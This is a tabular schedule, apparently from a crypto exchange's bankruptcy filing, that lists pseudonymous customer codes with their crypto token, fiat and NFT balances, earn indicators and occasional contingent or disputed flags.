| 07336192 | | BRZ[6.3034304], BTC[.13654084], CUSDT[8], DOGE[1006.11110365], ETH[2.09391507], ETHW[2.09301648], MATIC[2655.39239622], SHIB[1], SOL[11.67364263], TRX[9], USD[391.61], USDT[20.27316046] | Yes | |
| 07336193 | | USD[10.00] | | |
| 07336194 | | DOGE[1], USD[0.00] | | |
| 07336196 | | USD[10.00] | | |
| 07336197 | | DOGE[20.24668151], USD[9.00] | | |
| 07336198 | | USD[10.00] | | |
| 07336199 | | USD[10.00] | | |
| 07336200 | | USD[10.00] | | |
| 07336201 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07336202 | | USD[10.00] | | |
| 07336203 | | USD[10.00] | | |
| 07336205 | | CUSDT[3], DOGE[.48041917], LINK[.07572948], TRX[1], USD[0.00] | | |
| 07336206 | | USD[0.00] | | |
| 07336207 | | USD[10.00] | | |
| 07336208 | | USD[10.00] | | |
| 07336209 | | USD[10.00] | | |
| 07336210 | | DOGE[1896.43283558], USD[0.00] | | |
| 07336211 | | USD[10.00] | | |
| 07336212 | | USD[10.00] | | |
| 07336213 | | USD[10.00] | | |
| 07336214 | | BTC[.00012662], DOGE[229.2255093], TRX[128.02773193], USD[0.08] | | |
| 07336215 | | USD[0.63] | | |
| 07336216 | | BAT[1], BRZ[1], CUSDT[4], DOGE[61912.3831798], GRT[1], KSHIB[5274.85418984], PAXG[1.12357079], SHIB[22795730.25498677], SUSHI[86.88184052], TRX[8], USD[484.17] | | |
| 07336217 | | DOGE[26.23059451], ETH[0], USD[0.00] | Yes | |
| 07336218 | | USD[30.00] | | |
| 07336219 | | USD[10.00] | | |
| 07336220 | | USD[10.00] | | |
| 07336221 | | USD[10.00] | | |
| 07336222 | | USD[10.00] | | |
| 07336223 | | BRZ[1], DOGE[1], USD[4.72] | | |
| 07336224 | | USD[10.00] | | |
| 07336225 | | BRZ[1], LTC[0], TRX[1], USD[0.00] | | |
| 07336226 | | USD[10.00] | | |
| 07336227 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336228 | | BRZ[0], DOGE[0], USD[2.31] | Yes | |
| 07336229 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07336230 | | DOGE[.0000002], USD[0.00] | | |
| 07336231 | | BCH[0], BRZ[2], CUSDT[10], DAI[0], DOGE[269.57194439], ETH[0.00626528], ETHW[0.00626528], LINK[2.15757550], TRX[4], USD[0.00], USDT[0] | | |
| 07336232 | | DOGE[752.26210263], USD[0.00] | | |
| 07336233 | | USD[10.00] | | |
| 07336234 | | CUSDT[2], DOGE[514.47084068], USD[0.00] | | |
| 07336235 | | USD[10.00] | | |
| 07336236 | | DOGE[1], TRX[163.18950626], USD[0.00] | | |
| 07336237 | | CUSDT[6], DOGE[2.00004311], ETH[0], ETHW[0], SHIB[2734927.73293903], TRX[0], USD[1.13] | | |
| 07336238 | | BRZ[0], CUSDT[4], DOGE[0], SOL[0], TRX[1], USD[0.00], USDT[0] | | |
| 07336239 | | USD[10.00] | | |
| 07336240 | | DOGE[.35793642], USD[0.00] | | |
| 07336241 | | USD[10.00] | | |
| 07336242 | | USD[10.00] | | |
| 07336243 | | USD[10.00] | | |
| 07336244 | | USD[10.00] | | |
| 07336245 | | USD[10.00] | | |
| 07336246 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07336247 | | BRZ[1], USD[0.33] | Yes | |
| 07336248 | | USD[10.00] | | |
| 07336249 | | CUSDT[1], DOGE[86.7866036], USD[248.00] | | |
| 07336250 | | DOGE[551.00921438], ETH[0], GRT[0], USD[0.00] | | |
| 07336251 | | CUSDT[4], GRT[1], TRX[1], USD[0.27] | | |
| 07336252 | | USD[10.00] | | |
| 07336253 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07336254 | | USD[10.00] | | |
| 07336255 | | TRX[0], USD[0.00] | | |
| 07336256 | | USD[10.00] | | |
| 07336257 | | BTC[0], USD[0.01] | | |
| 07336258 | | DOGE[18.52184387], USD[0.00] | | |
| 07336259 | | USD[10.00] | | |
| 07336260 | | USD[10.00] | | |
| 07336261 | | USD[10.00] | | |
| 07336262 | | CUSDT[1], DOGE[782.30313644], ETH[.45803615], ETHW[.45803615], TRX[1], USD[0.00] | | |
| 07336263 | | USD[10.00] | | |
| 07336264 | | USD[10.00] | | |
| 07336265 | | USD[0.00] | | |
| 07336266 | | USD[10.00] | | |
| 07336267 | | BRZ[1], CUSDT[2], DOGE[9397.33815659], GRT[2], LINK[10.22147328], LTC[14.94552409], TRX[3600.10219771], UNI[30.44596103], USD[0.25] | | |
| 07336268 | | USD[10.00] | | |
| 07336269 | | USD[10.00] | | |
| 07336270 | | USD[10.00] | | |
| 07336271 | | USD[10.00] | | |
| 07336272 | | USD[10.00] | | |
| 07336273 | | USD[10.00] | | |
| 07336274 | | DOGE[1], USD[0.00] | | |
| 07336275 | | USD[0.00] | | |
| 07336276 | | USD[10.00] | | |
| 07336277 | | USD[10.00] | | |
| 07336278 | | BRZ[2], CUSDT[4], DOGE[2319.04346776], TRX[354.67257134], USD[0.01] | | |
| 07336279 | | USD[10.00] | | |
| 07336280 | | USD[10.00] | | |
| 07336281 | | USD[10.00] | | |
| 07336282 | | USD[10.00] | | |
| 07336283 | | USD[10.00] | | |
| 07336284 | | USD[10.00] | | |
| 07336285 | | BTC[.01892768], CUSDT[5], DOGE[7009.60203705], ETH[3.80358832], ETHW[3.80199083], GRT[1.00414747], TRX[2361.10426556], USD[0.00], USDT[2.20659815] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336286 | | USD[10.00] | | |
| 07336287 | | USD[10.00] | | |
| 07336288 | | USD[10.00] | | |
| 07336289 | | USD[10.00] | | |
| 07336290 | | ETH[.01], ETHW[.01], SOL[0], USD[2.19] | | |
| 07336291 | | BRZ[3], CUSDT[2], DOGE[11854.58788626], ETH[2.41780683], ETHW[2.41780683], GRT[2], LINK[.00004816], SHIB[18034825.87064676], SOL[30.40643974], TRX[4], USD[0.25], USDT[3] | | |
| 07336292 | | BTC[.00000044], CUSDT[1], DOGE[12807.13799824], TRX[3], USD[0.00] | Yes | |
| 07336293 | | USD[10.00] | | |
| 07336294 | | USD[10.00] | | |
| 07336295 | | DOGE[1], USD[0.00] | | |
| 07336296 | | USD[10.00] | | |
| 07336297 | | SHIB[97381137.35227906], USD[0.00], USDT[0] | | |
| 07336298 | | BAT[.09670341], CUSDT[15], DOGE[72.01594251], EUR[0.70], GRT[14.18586291], TRX[2], USD[0.00] | | |
| 07336299 | | USD[10.00] | | |
| 07336300 | | USD[0.00] | | |
| 07336301 | | USD[10.00] | | |
| 07336302 | | BAT[1], BRZ[2], GRT[1], SUSHI[1], TRX[3], USD[0.01] | | |
| 07336303 | | DOGE[.01641256], USD[0.00] | | |
| 07336304 | | USD[10.00] | | |
| 07336306 | | CUSDT[9], DOGE[288.52120173], SHIB[17130.72352223], TRX[241.33540961], USD[50.54], USDT[0] | Yes | |
| 07336307 | | CUSDT[3], USD[0.01], USDT[0] | | |
| 07336308 | | BTC[.00022976], CUSDT[2], USD[0.01] | | |
| 07336309 | | USD[10.00] | | |
| 07336310 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07336311 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07336312 | | USD[0.01] | | |
| 07336313 | | USD[0.00] | | |
| 07336314 | | USD[10.00] | | |
| 07336315 | | USD[10.00] | | |
| 07336316 | | DOGE[0], USD[0.01], USDT[0] | | |
| 07336317 | | USD[10.00] | | |
| 07336318 | | BAT[2.0135462], BRZ[1], BTC[.24597323], CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07336319 | | BRZ[1], BTC[.00353079], CUSDT[4], DOGE[6543.22764657], SHIB[1], TRX[1115.84805805], USD[0.00] | Yes | |
| 07336320 | | BAT[1], BRZ[1], CUSDT[1], DOGE[256.27400753], USD[0.35] | | |
| 07336321 | | USD[10.00] | | |
| 07336322 | | USD[12.00] | | |
| 07336323 | | USD[0.00] | | |
| 07336324 | | USD[10.00] | | |
| 07336325 | | CUSDT[2], DOGE[30.85006622], UNI[113.30923989], USD[1.38] | Yes | |
| 07336326 | | USD[0.01] | | |
| 07336327 | | USD[10.00] | | |
| 07336328 | | CUSDT[.40933577], DOGE[1.61069583], USD[0.01] | | |
| 07336330 | | USD[10.00] | | |
| 07336331 | | USD[10.00] | | |
| 07336332 | | USD[10.00] | | |
| 07336333 | | DOGE[2554.02590604], ETH[.00000001], ETHW[0], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07336334 | | BCH[0], BTC[0], CUSDT[11], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07336335 | | USD[10.00] | | |
| 07336336 | | USD[10.00] | | |
| 07336337 | | CUSDT[1], DOGE[.05001017], USD[0.46] | | |
| 07336338 | | USD[10.00] | | |
| 07336339 | | BTC[.00428224], CUSDT[5], DOGE[3619.90877695], KSHIB[2199.46799268], TRX[1], USD[516.74] | Yes | |
| 07336340 | | BRZ[0], DOGE[1], USD[11.95] | | |
| 07336341 | | CUSDT[4], DOGE[.00066104], TRX[3], USD[0.02] | | |
| 07336342 | | USD[0.00] | | |
| 07336343 | | USD[10.00] | | |
| 07336345 | | USD[10.00] | | |
| 07336346 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336347 | | BTC[.00024748], CUSDT[4], DOGE[.00001603], SHIB[2], TRX[1], USD[0.01] | Yes | |
| 07336349 | | ETH[.00001019], ETHW[.00001019], USD[0.00] | Yes | |
| 07336350 | | USD[10.00] | | |
| 07336351 | | CUSDT[19], DOGE[131.37716664], TRX[2], USD[0.69] | Yes | |
| 07336352 | | DOGE[0], SHIB[175435.66600829], USD[0.00] | Yes | |
| 07336353 | | BTC[0], CUSDT[1], DOGE[3], SUSHI[36.92402348], TRX[1], UNI[9.19414038], USD[10.12] | | |
| 07336354 | | TRX[1], USD[10.00] | | |
| 07336355 | | USD[10.00] | | |
| 07336357 | | DOGE[1766.55129729], USD[11.00] | | |
| 07336358 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07336359 | | USD[10.00] | | |
| 07336360 | | USD[10.00] | | |
| 07336361 | | USD[0.67], USDT[0] | | |
| 07336362 | | USD[10.00] | | |
| 07336363 | | USD[10.00] | | |
| 07336364 | | CUSDT[2], DOGE[10.86335371], TRX[10.47276143], USD[0.00] | | |
| 07336365 | | ETH[0.00000180], ETHW[0.19665252], SHIB[2.62734402], SOL[.00022224], TRX[.00166965], USD[434.82] | Yes | |
| 07336366 | | GRT[1], TRX[1], USD[0.00] | | |
| 07336368 | | USD[10.00] | | |
| 07336369 | | CUSDT[2], ETH[0.02560151], ETHW[0.02528687], TRX[0], USD[0.00] | | |
| 07336370 | | USD[10.00] | | |
| 07336372 | | USD[10.00] | | |
| 07336373 | | USD[10.00] | | |
| 07336374 | Contingent, Disputed | USD[0.00], USDT[0] | | |
| 07336375 | | USD[10.00] | | |
| 07336376 | | CUSDT[1], DOGE[4], TRX[1], USD[0.01] | | |
| 07336377 | | DOGE[.00000986], TRX[2], USD[0.84] | | |
| 07336378 | | USD[25.00] | | |
| 07336379 | | USD[10.00] | | |
| 07336380 | | USD[10.00] | | |
| 07336381 | | BRZ[1], CUSDT[1], DOGE[130.24302274], TRX[2], USD[0.83] | | |
| 07336382 | | BTC[.05153513], CUSDT[1], DOGE[11114.08803356], TRX[4411.02778798], USD[22.88] | Yes | |
| 07336383 | | BRZ[3], BTC[.00046454], CUSDT[7], DOGE[1], ETH[.00868358], ETHW[.00857414], SHIB[1], TRX[4], USD[0.00] | Yes | |
| 07336386 | | SUSHI[.62880366], USD[0.00] | Yes | |
| 07336387 | | BTC[0], USD[0.14] | Yes | |
| 07336388 | | BRZ[1], CUSDT[2], DOGE[580.67910214], TRX[2], USD[0.00] | | |
| 07336389 | | USD[10.00] | | |
| 07336390 | | BTC[0], DOGE[25633.55769578], ETH[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07336391 | | AAVE[1.30306393], BTC[.00000304], CUSDT[5], DOGE[2099.80286484], ETHW[.82891412], LINK[17.13578969], TRX[4], USD[0.00] | Yes | |
| 07336392 | | USD[0.00], USDT[0] | Yes | |
| 07336393 | | DOGE[72520.49657743], ETH[0], USD[0.00], USDT[1] | | |
| 07336394 | | DOGE[1], USD[0.00] | | |
| 07336395 | | USD[10.00] | | |
| 07336396 | | DOGE[1], SHIB[1], USD[0.01] | Yes | |
| 07336397 | | USD[10.00] | | |
| 07336398 | | USD[10.00] | | |
| 07336399 | | BTC[.00109164], CUSDT[1], DOGE[49.19715102], ETH[.01341281], ETHW[.01324853], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07336400 | | USD[10.00] | | |
| 07336401 | | USD[0.12] | | |
| 07336402 | | USD[10.00] | | |
| 07336403 | | USD[10.00] | | |
| 07336404 | | USD[10.00] | | |
| 07336405 | | USD[1225.70] | | |
| 07336406 | | USD[10.00] | | |
| 07336408 | | USD[10.00] | | |
| 07336409 | | USD[0.02], USDT[0.00000001] | Yes | |
| 07336410 | | CUSDT[2], DOGE[770.16342323], GRT[1], USD[0.67] | | |
| 07336411 | | USD[15.50] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336412 | | BAT[2.12059103], BRZ[5.07952967], CUSDT[15], DOGE[1], ETH[0], ETHW[0], GRT[1.00498957], LINK[.32245426], USD[0.73], USDT[2.20812136] | Yes | |
| 07336413 | | BTC[.00054559], DOGE[1061.2671306], USD[0.00] | Yes | |
| 07336414 | | DOGE[0], USD[0.00] | | |
| 07336415 | | USD[10.00] | | |
| 07336416 | | BCH[0], BTC[.00003633], CUSDT[3], DOGE[0], ETH[0.00000035], NFT (434602983378184754/Cr iberd #8)[1], SHIB[3], TRX[1], USD[0.00] | Yes | |
| 07336417 | | DOGE[0], ETH[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07336419 | | BRZ[9], CUSDT[11], DOGE[8850.81891818], TRX[11], USD[0.11], USDT[0.00000001] | | |
| 07336420 | | BRZ[1], BTC[.00000691], CUSDT[1], DOGE[16024.15646523], ETH[.36674055], ETHW[.36658645], TRX[3], USD[0.00] | Yes | |
| 07336421 | | USD[10.00] | | |
| 07336422 | | TRX[1], USD[0.01] | | |
| 07336424 | | DOGE[1], TRX[1], USD[0.01], USDT[0] | | |
| 07336425 | | USD[10.00] | | |
| 07336426 | | BRZ[1], CUSDT[3], TRX[1], USD[0.01] | | |
| 07336427 | | CUSDT[2], DOGE[17.31961114], LTC[0.03249261], SHIB[106802.42134156], SOL[0.00379101], TRX[56.33617613], USD[0.00] | Yes | |
| 07336428 | | BAT[1], DOGE[209.17281203], USD[0.18] | | |
| 07336429 | | USD[10.00] | | |
| 07336430 | | USD[10.00] | | |
| 07336431 | | BAT[1], BRZ[3], CUSDT[4], DOGE[1], GRT[1], TRX[1], USD[0.00] | | |
| 07336432 | | BRZ[1], CUSDT[1], ETH[0], TRX[1], USD[0.00] | | |
| 07336433 | | USD[10.51] | Yes | |
| 07336434 | | USD[10.00] | | |
| 07336435 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07336436 | | USD[32.86] | Yes | |
| 07336437 | | USD[10.00] | | |
| 07336439 | | BTC[0], DOGE[0], LINK[0], TRX[0], USD[0.00] | Yes | |
| 07336440 | | BAT[1], BF_POINT[300], DOGE[2], SHIB[3], SOL[0.00000001], TRX[3], USD[0.00] | Yes | |
| 07336441 | | USD[10.00] | | |
| 07336442 | | CUSDT[1], USD[0.00] | | |
| 07336443 | | DOGE[1], USD[0.01] | | |
| 07336444 | | USD[10.00] | | |
| 07336445 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07336446 | | CUSDT[4], SHIB[126985.17961511], TRX[1], USD[0.00] | | |
| 07336447 | | USD[15.70] | | |
| 07336448 | | ETH[.00546582], ETHW[.00546582], USD[0.04] | | |
| 07336449 | | USD[10.00] | | |
| 07336450 | | CUSDT[4], TRX[1], USD[0.01] | Yes | |
| 07336451 | | USD[10.00] | | |
| 07336452 | | BTC[.0000188], ETH[.0007], ETHW[.0007], TRX[.000007], USD[0.00], USDT[0] | | |
| 07336453 | | USD[1.00], USDT[0] | | |
| 07336454 | | USD[10.00] | | |
| 07336455 | | USD[10.00] | | |
| 07336458 | | USD[0.03] | | |
| 07336459 | | BTC[.00000255], CUSDT[1], DOGE[4], ETH[.00004999], ETHW[.00004999], USD[5.77] | | |
| 07336460 | | USD[10.00] | | |
| 07336461 | | CUSDT[1], DOGE[.00003767], TRX[1], USD[0.00] | | |
| 07336462 | | CUSDT[1], USD[12.50] | | |
| 07336463 | | USD[10.00] | | |
| 07336464 | | USD[10.00] | | |
| 07336465 | | CUSDT[1], DOGE[1406.72151731], SUSHI[5.77348101], TRX[1115.02018047], USD[0.00] | | |
| 07336467 | | CUSDT[1], DOGE[1609.86058604], TRX[1], USD[0.01] | | |
| 07336468 | | CUSDT[1], DOGE[130.27253166], TRX[2], USD[0.00], USDT[0] | | |
| 07336469 | | USD[10.00] | | |
| 07336470 | | BAT[1.01402431], BRZ[5.07952967], CUSDT[7], DOGE[1091.63698055], TRX[1], USD[0.01] | Yes | |
| 07336471 | | USD[10.00] | | |
| 07336472 | | BTC[0], ETH[0], ETHW[0], SHIB[4], USD[297.59] | Yes | |
| 07336473 | | DOGE[1], USD[29.33] | | |
| 07336474 | | USD[10.00] | | |
| 07336475 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336476 | | BRZ[3], BTC[.00000001], CUSDT[7], DOGE[1.00002871], USD[0.38], USDT[1.06938788] | Yes | |
| 07336477 | | BRZ[2], BTC[0], CUSDT[6], SHIB[1], SOL[.41867344], TRX[3], USD[0.00] | Yes | |
| 07336480 | | BRZ[2], CUSDT[2], GRT[1], TRX[2], USD[0.00] | | |
| 07336481 | | BRZ[1], CUSDT[1], USD[0.25] | | |
| 07336483 | | CUSDT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07336484 | | BRZ[2], BTC[.00003077], DOGE[50.67649075], ETH[.00154782], ETHW[.00154782], KSHIB[46.54808526], SHIB[62985.51333193], TRX[1], USD[0.00] | | |
| 07336485 | | BAT[7.77095968], BRZ[8.82167285], CUSDT[48.76691387], DOGE[1], GRT[3.1669232], KSHIB[191.87948205], LTC[.21413261], NFT (357426475316659095/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #22)[1], NFT (379818784639523681/Australia Ticket Stub #1393)[1], NFT (421730963696836351/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #14)[1], SHIB[1639769.69533105], SOL[26.4473794], TRX[14.64405165], USD[339.16], USDT[4.37234413] | Yes | |
| 07336486 | | CUSDT[3], DOGE[2054.74646789], LINK[2.10294141], SOL[1.79832667], TRX[1], USD[0.00] | | |
| 07336487 | | USD[10.00] | | |
| 07336488 | | DOGE[1501.86780176], USD[10.00] | | |
| 07336489 | | CUSDT[1], DOGE[1.53565054], TRX[2], USD[28.17] | | |
| 07336490 | | USD[10.00] | | |
| 07336491 | | DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07336492 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | Yes | |
| 07336493 | | USD[10.00] | | |
| 07336494 | | DOGE[3], LTC[.11411656], USD[0.00] | | |
| 07336495 | | USD[10.00] | | |
| 07336496 | | USD[10.00] | | |
| 07336497 | | BAT[2], BRZ[2], CUSDT[2], DOGE[59096.88746613], GRT[1], TRX[3], USD[0.00], USDT[4] | | |
| 07336498 | | USD[10.00] | | |
| 07336499 | | USD[0.19] | | |
| 07336500 | | BTC[.00021157], DOGE[119.91657745], USD[0.00] | Yes | |
| 07336501 | | USD[10.00] | | |
| 07336502 | | USD[10.00] | | |
| 07336503 | | CUSDT[7], DOGE[1.23559025], TRX[3], USD[0.00] | | |
| 07336504 | | CUSDT[2], USD[447.54] | | |
| 07336505 | | BAT[1.00052595], USD[10.00], USDT[0] | | |
| 07336506 | | USD[10.00] | | |
| 07336507 | | BAT[0.06340447], BCH[0.00174683], BRZ[1], BTC[0.00003310], CUSDT[85.20517373], DOGE[74.72796297], ETH[0], GRT[1.06646261], LINK[0.0062673], LTC[0.00603818], SOL[0.11749483], SUSHI[0.00028717], TRX[13.12484765], UNI[.0007685], USD[0.01], YFI[0.00000433] | | |
| 07336509 | | USD[10.00] | | |
| 07336510 | | USD[0.00] | | |
| 07336511 | | USD[10.00] | | |
| 07336512 | | USD[10.00] | | |
| 07336514 | | USD[0.00] | | |
| 07336515 | | USD[10.00] | | |
| 07336516 | | ETH[.00383595], ETHW[.00383595], USD[0.00] | | |
| 07336517 | | USD[10.00] | | |
| 07336518 | | DOGE[1], USD[0.04] | Yes | |
| 07336519 | | CUSDT[2], DOGE[0], SHIB[3], TRX[6], USD[0.36] | | |
| 07336520 | | USD[10.00] | | |
| 07336521 | | USD[10.00] | | |
| 07336522 | | CUSDT[2], USD[0.01] | Yes | |
| 07336523 | | USD[10.00] | | |
| 07336524 | | DOGE[0.03068949], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07336525 | | USD[0.00], USDT[0] | Yes | |
| 07336526 | | USD[10.00] | | |
| 07336528 | | USD[10.00] | | |
| 07336529 | | BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07336530 | | DOGE[.93012814], USD[0.00] | | |
| 07336531 | | USD[10.00] | | |
| 07336532 | | USD[0.45], USDT[0] | | |
| 07336533 | | BRZ[1], CUSDT[3], DOGE[2], TRX[2148.22545016], USD[0.00] | Yes | |
| 07336534 | | USD[0.00] | | |
| 07336535 | | TRX[0], USD[0.00] | | |
| 07336536 | | DOGE[1.14324335], USD[0.00], USDT[0] | | |
| 07336537 | | USD[10.00] | | |
| 07336538 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336539 | | USD[10.00] | | |
| 07336540 | | DAI[11117.87898734], USD[11.01] | Yes | |
| 07336541 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07336542 | | USD[10.00] | | |
| 07336543 | | BRZ[2], BTC[.0176478], CUSDT[11], DOGE[13783.47403391], ETH[.12324201], ETHW[.12206911], SHIB[17339752.98017335], TRX[4], USD[0.00] | Yes | |
| 07336544 | | SHIB[.00000041], USD[0.00] | Yes | |
| 07336545 | | DOGE[62.36199837], SHIB[299626.46816479], USD[0.13] | | |
| 07336547 | | USD[10.00] | | |
| 07336548 | | MATIC[0], SHIB[0], USD[0.00] | Yes | |
| 07336549 | | USD[10.00] | | |
| 07336550 | | USD[10.00] | | |
| 07336551 | | CUSDT[1], SOL[0.04595298], USD[0.00] | Yes | |
| 07336552 | | USD[10.00] | | |
| 07336553 | | GRT[0], LTC[0], USD[0.00] | Yes | |
| 07336554 | | USD[210.00] | | |
| 07336555 | | BTC[.00016244], DOGE[1], ETH[.00227416], ETHW[.0022468], USD[0.07] | Yes | |
| 07336557 | | USD[17.43] | | |
| 07336558 | | USD[10.00] | | |
| 07336559 | | BRZ[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00] | | |
| 07336560 | | USD[10.00] | | |
| 07336561 | | USD[10.00] | | |
| 07336563 | | USD[10.00] | | |
| 07336564 | | USD[10.00] | | |
| 07336565 | | DOGE[1], ETH[0], ETHW[0], TRX[1], USD[0.00] | | |
| 07336566 | | USD[10.00] | | |
| 07336567 | | DOGE[ 23549529], TRX[1], USD[7.00] | | |
| 07336568 | | USD[0.01] | | |
| 07336570 | | BRZ[1.07784769], TRX[.01176964], USD[0.00] | | |
| 07336572 | | ETH[.00651198], ETHW[.00651198], USD[0.00] | | |
| 07336573 | | USD[10.00] | | |
| 07336575 | | BAT[205.16832112], BRZ[52.38599425], BTC[.00870132], CUSDT[697.79302499], DOGE[18126.31306386], GRT[152.52942085], SHIB[2], TRX[8442.58835167], USD[0.00], USDT[2.06786639] | Yes | |
| 07336577 | | USD[0.00] | | |
| 07336578 | | DOGE[1], USD[0.00] | Yes | |
| 07336579 | | USD[10.00] | | |
| 07336580 | | DOGE[.00078724], ETH[0], ETHW[0], TRX[2], USD[0.00] | | |
| 07336581 | | CUSDT[3], USD[0.16] | | |
| 07336582 | | USD[10.00] | | |
| 07336583 | | USD[10.00] | | |
| 07336585 | | BRZ[1], CUSDT[1], DOGE[58.44237078], ETH[0.33489767], ETHW[0.33474467], LTC[0], USD[0.00] | Yes | |
| 07336586 | | USD[10.00] | | |
| 07336587 | | CUSDT[1], USD[0.00] | | |
| 07336588 | | BRZ[2], CUSDT[6], DOGE[2], SHIB[0], SOL[0], USD[0.00], USDT[1.08938798] | Yes | |
| 07336589 | | USD[10.00] | | |
| 07336590 | | USD[10.00] | | |
| 07336591 | | DOGE[0], SHIB[1], USD[2.27] | | |
| 07336592 | | CUSDT[3], DOGE[2170.64882368], USD[38.82] | | |
| 07336593 | | BRZ[1], CUSDT[1], TRX[4], USD[0.01] | | |
| 07336594 | | USD[10.00] | | |
| 07336595 | | USD[10.00] | | |
| 07336596 | | USD[10.00] | | |
| 07336597 | | BRZ[0.00000018], CUSDT[2], DOGE[3], ETH[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07336598 | | DOGE[1], SOL[.01355355], USD[0.00] | | |
| 07336599 | | USD[10.00] | | |
| 07336600 | | USD[10.00] | | |
| 07336601 | | BRZ[.04666352], BTC[.01691287], CUSDT[13.01525328], DOGE[29121.49335974], ETH[1.0480166], ETHW[1.04757638], GRT[1], KSHIB[113.19099565], LTC[1.13923027], NFT [361647895035606911/MinnesotaLakePath][1], NFT [377514957528928445/GeorgiaAlley][1], NFT [381831250118123194/Unlimited Power][1], NFT [463135694363396654/VermontFord][1], SHIB[1718088.31336618], SOL[1.17736684], SUSHI[1.09101787], TRX[500.11428523], USD[0.19] | Yes | |
| 07336602 | | DOGE[2], SUSHI[2.0412741], TRX[999.20659658], USD[0.00] | | |
| 07336603 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336604 | | USD[10.00] | | |
| 07336605 | | BRZ[0], BTC[.00299126], DOGE[0], PAXG[.01878162], SHIB[5], SOL[5.27550096], USD[0.00], USDT[0] | Yes | |
| 07336606 | | USD[0.01] | | |
| 07336607 | | USD[10.00] | | |
| 07336608 | | USD[10.00] | | |
| 07336609 | | USD[10.00] | | |
| 07336610 | | BRZ[2], USD[0.00] | | |
| 07336611 | | USD[10.00] | | |
| 07336612 | | USD[10.00] | | |
| 07336613 | | BTC[.00022008], CUSDT[14], DOGE[289.28946494], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07336614 | | USD[10.00] | | |
| 07336615 | | BTC[.00017619], TRX[1], USD[0.00] | | |
| 07336616 | | USD[10.00] | | |
| 07336617 | | CUSDT[11], TRX[3], USD[0.01] | | |
| 07336618 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07336619 | | CUSDT[5], DOGE[0.11113145], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07336620 | | DOGE[1.00005276], USD[0.00] | | |
| 07336621 | | USD[10.00] | | |
| 07336622 | | ETH[.00245558], ETHW[.00242822], LTC[0], USD[8.86] | Yes | |
| 07336625 | | BRZ[1], CUSDT[9], DOGE[1279.13903783], TRX[406.67103781], USD[0.88], USDT[1.10832387] | Yes | |
| 07336626 | | CUSDT[1], DOGE[5.99997678], LINK[0], TRX[1], USD[0.00] | | |
| 07336627 | | USD[10.00] | | |
| 07336628 | | USD[10.00] | | |
| 07336629 | | USD[10.00] | | |
| 07336631 | | BRZ[1], CUSDT[4], DOGE[1], GRT[1], TRX[3], USD[0.00] | | |
| 07336632 | | USD[10.00] | | |
| 07336634 | | DOGE[1.00002512], USD[0.01] | | |
| 07336635 | | BRZ[0], CUSDT[2], DOGE[1], SHIB[54177.5031959], TRX[2], USD[0.01] | Yes | |
| 07336637 | | USD[10.00] | | |
| 07336638 | | BTC[0.00061544], ETH[0], LINK[0], SOL[0.00013801], UNI[0], USD[0.00], USDT[0.00002063] | Yes | |
| 07336639 | | USD[10.00] | | |
| 07336640 | | USD[10.00] | | |
| 07336641 | | CUSDT[8], DOGE[34.58928275], USD[0.01] | | |
| 07336642 | | DOGE[1], UNI[0], USD[0.00] | | |
| 07336643 | | USD[10.00] | | |
| 07336644 | | USD[10.00] | | |
| 07336645 | | DOGE[3.00019584], USD[0.01] | | |
